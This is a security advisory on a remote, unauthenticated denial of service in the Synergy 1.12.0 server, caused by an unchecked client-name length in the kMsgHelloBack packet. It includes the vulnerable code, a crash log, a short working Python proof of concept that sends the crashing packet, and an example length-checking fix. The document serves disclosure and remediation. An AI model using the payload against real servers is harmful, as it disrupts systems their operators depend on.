Advisory
Zendesk Ticket: 132450
Vendor: Symless
Software: Synergy
Software URL: https://github.com/symless/synergy-core https://symless.com/synergy
Version Reviewed: 1.12.0, protocol version 1.6
Bug Type: Denial of Service / Crash
Vector: Remote, unauthenticated
Impact: Denial of Service
Discovery Date: 20200706
Discovered By: Sven Blumenstein of Apple Information Security
CVSS: 6.5
Summary:
A Synergy server can be crashed by sending a kMsgHelloBack packet with a client name length set to
0xffffffff (4294967295) if the server's memory is less than 4 GB.
Technical Details:
If a client sends a kMsgHelloBack packet, the size of the client name is sent as 4 bytes, which are parsed as follows (synergy-core/src/lib/synergy/ProtocolUtil.cpp, lines 208 to 211 in 0e7fef7):
UInt32 len = (static_cast<UInt32>(buffer[0]) << 24) |
             (static_cast<UInt32>(buffer[1]) << 16) |
             (static_cast<UInt32>(buffer[2]) << 8) |
             static_cast<UInt32>(buffer[3]);
Next, a buffer is allocated based on that value (synergy-core/src/lib/synergy/ProtocolUtil.cpp, lines 217 to 220 in 0e7fef7):
UInt8* sBuffer = buffer;
if (!useFixed) {
    sBuffer = new UInt8[len];
}
This will fail if the requested buffer size is larger than the available system memory, and the resulting exception is caught by the following code (synergy-core/src/lib/synergy/ServerApp.cpp, lines 660 to 663 in 78be330):
} catch (std::bad_alloc &ba) {
    delete server;
    throw ba;
}
Log file output of a crash based on this issue:
synergys -f -d DEBUG2 --config synergy.conf
[...]
[2020-07-06T15:14:45] NOTE: accepted client connection
[2020-07-06T15:14:45] DEBUG1: registered event type inputReady as 37
[2020-07-06T15:14:45] DEBUG1: registered event type outputError as 38
[2020-07-06T15:14:45] DEBUG1: registered event type inputShutdown as 39
[2020-07-06T15:14:45] DEBUG1: registered event type outputShutdown as 40
[2020-07-06T15:14:45] DEBUG1: saying hello
[2020-07-06T15:14:45] DEBUG2: writef(Synergy%2i%2i)
[2020-07-06T15:14:45] DEBUG1: registered event type outputFlushed as 41
[2020-07-06T15:14:45] DEBUG2: wrote 11 bytes
[2020-07-06T15:14:45] DEBUG1: registered event type success as 42
[2020-07-06T15:14:45] DEBUG1: registered event type failure as 43
[2020-07-06T15:14:45] DEBUG1: parsing hello reply
[2020-07-06T15:14:45] DEBUG2: readf(Synergy%2i%2i%s)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 1 (0x1)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 6 (0x6)
[2020-07-06T15:14:45] DEBUG1: caught cancel on thread 0x00000002
[2020-07-06T15:14:45] FATAL: An error occurred: std::bad_alloc
Synergy config file and proof of concept:
synergy.conf:
section: screens
    synclient:
    syntest:
end
section: links
    synclient:
        right = syntest
    syntest:
        left = synclient
end
Proof of concept:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.13.37.207', 24800))
print s.recv(2048)
s.sendall('\x00\x00\x00\x10Synergy\x00\x01\x00\x06\xff\xff\xff\xffA')
It was verified that this issue does not cause a crash through the exception handler if the
available memory of the Server is more than 4GB.
Recommendations:
- Limit the maximum value of a string parameter to a more reasonable amount for the kMsgHelloBack packet.
- Check string allocation size against available memory and catch an exception without terminating the server.
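One way to implement the first recommendation, as an added example that is not Synergy's own code or its actual fix: the claimed name length is validated against a cap and against the bytes actually received before any allocation. It assumes the hello reply body is already in a buffer; `kMaxNameLen`, `ReadResult`, `readBE` and `parseHelloBack` are hypothetical names.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <string>

// Hypothetical cap; the advisory only asks for "a more reasonable amount".
constexpr std::uint32_t kMaxNameLen = 256;

enum class ReadResult { Ok, Malformed, Truncated, TooLong };

// Big-endian decode, same arithmetic as the parser quoted in the advisory.
static std::uint32_t readBE(const std::uint8_t* p, int bytes) {
    std::uint32_t v = 0;
    for (int i = 0; i < bytes; ++i) v = (v << 8) | p[i];
    return v;
}

// Parse a hello reply body: "Synergy", 2-byte major, 2-byte minor, then a
// 4-byte length and the client name. The claimed length is checked against
// the cap and against the bytes actually received before anything is
// allocated, so 0xffffffff is rejected without reaching operator new.
ReadResult parseHelloBack(const std::uint8_t* buf, std::size_t size,
                          int& major, int& minor, std::string& name) {
    if (size < 15) return ReadResult::Truncated;  // 7 + 2 + 2 + 4
    if (std::memcmp(buf, "Synergy", 7) != 0) return ReadResult::Malformed;
    major = static_cast<int>(readBE(buf + 7, 2));
    minor = static_cast<int>(readBE(buf + 9, 2));
    const std::uint32_t len = readBE(buf + 11, 4);
    if (len > kMaxNameLen) return ReadResult::TooLong;
    if (size - 15 < len) return ReadResult::Truncated;
    name.assign(reinterpret_cast<const char*>(buf + 15), len);
    return ReadResult::Ok;
}

int main() {
    // Constructed sample: hello reply body claiming a 0xffffffff-byte name.
    const std::uint8_t oversized[] = {'S','y','n','e','r','g','y', 0,1, 0,6,
                                      0xff,0xff,0xff,0xff, 'A'};
    int major = 0, minor = 0;
    std::string name;
    ReadResult r = parseHelloBack(oversized, sizeof oversized, major, minor, name);
    std::printf("oversized name: %s\n",
                r == ReadResult::TooLong ? "rejected" : "accepted");
    return 0;
}
```

A caller would drop the connection on any result other than `ReadResult::Ok` and keep serving other clients.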